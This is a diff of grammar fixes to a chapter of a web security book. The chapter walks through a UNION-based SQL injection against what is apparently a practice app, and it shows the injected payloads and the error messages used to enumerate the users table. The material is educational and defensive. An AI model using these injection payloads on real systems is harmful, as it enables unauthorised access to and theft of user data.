binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter10.md

 G>
 G> Time to work out what the table name is.
 G>
-G> Lets try users.
+G> Let's try users.
 I'm thinking that the full query will look like:
 G> `SELECT ID, first_name, last_name FROM users WHERE ID = '1' UNION SELECT ID, first_name, last_name FROM users WHERE first_name LIKE '%'`
 G> Inject query:
 G> `1' UNION SELECT ID, first_name, last_name FROM users WHERE first_name LIKE '%`
 G> Output: Unknown column 'ID'
-G> Lets fix that:
+G> Let's fix that:
 G> `1' UNION SELECT user_id, first_name, last_name FROM users WHERE first_name LIKE '%`
 G> Output: "The used SELECT statements have a different number of columns"
-G> This told me that the query on the server was slightly different to what I thought.
+G> This told me that the query on the server was slightly different than what I thought.
 My revised guess of the full query:
 G> `SELECT first_name, last_name FROM users WHERE user_id = '1' UNION SELECT first_name, last_name FROM users WHERE first_name LIKE '%'`
 G> Inject query:
 G> `1' UNION SELECT first_name, last_name FROM users WHERE first_name LIKE '%`